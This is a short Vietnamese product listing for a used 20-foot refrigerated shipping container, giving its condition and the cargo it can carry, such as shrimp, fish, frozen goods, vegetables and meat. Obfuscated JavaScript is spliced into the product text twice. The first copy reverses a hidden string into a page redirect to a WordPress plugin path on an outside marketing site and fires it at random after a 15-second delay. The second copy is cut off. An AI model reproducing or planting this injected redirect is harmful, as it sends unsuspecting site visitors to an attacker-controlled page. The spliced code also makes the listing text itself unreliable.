CONTAINER LẠNH 20 FEET

    lanh 20

    THÔNG SỐ KỸ THUẬT CONTAINER LẠNH 20FT container lạnh 20ft đã qua sử dụng đạt 80% chât lượng theo tiêu chuẩn quốc tế có thông số kỹ thuật như sau: THUỘC TÍNH CƠ BẢN CỦA CONTAINER LẠNH Container lạnh 20 feet , thùng lạnh$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} có thể chuyên chở các loại hàng hóa như:  tôm cá, hàng đông lạnh, rau quả, thịt ... Công dụng Container lạnh - Thùng lạnh: $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == ...Tìm hiểu thêm

    Đăng 3 năm trước

    0 người Comments